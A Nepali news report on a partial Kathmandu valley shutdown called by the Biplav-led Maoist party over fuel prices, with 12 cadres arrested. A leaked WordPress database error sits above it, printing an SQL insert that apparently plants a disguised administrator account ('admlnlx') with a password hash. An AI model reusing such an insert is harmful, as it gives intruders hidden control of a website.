WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAi0PRThyU2DebAWKbDqpmj8bwUCqe/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 09:26:21', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ७ –
पेट्रोलियम पदार्थमा भएको मूल्यवृद्धिको विरोधमा नेत्रविक्रम चन्द ‘विप्लव’ नेतृत्वको नेकपा माओवादीले आयोजना गरेको उपत्यका बन्दको आंशिक प्रभाव परेको छ ।
राजधानीमा बन्दका कारण आगजनी, तोडफोड वा कुनै घटना नभए पनि निजी तथा सार्वजनिक विद्यालय र क्याम्पस बन्द छन् । बिहानैदेखि निजी सवारीसाधन चलेपनि भाडाका सवारी भने अत्यन्त कम मात्रामा चलेका छन् ।
महानगरीय प्रहरी परिसर काठमाडौँका निमित्त प्रमुख तथा प्रहरी उपरीक्षक प्रद्युम्न कार्कीका अनुसार रत्नपार्क, सोह्रखुट्टे, बबरमहललगायत विभिन्न स्थानबाट बन्द गराउँदै हिँडेका नेकपा माओवादीका १२ कार्यकर्तालाई पक्राउ गरिएको छ । – रासस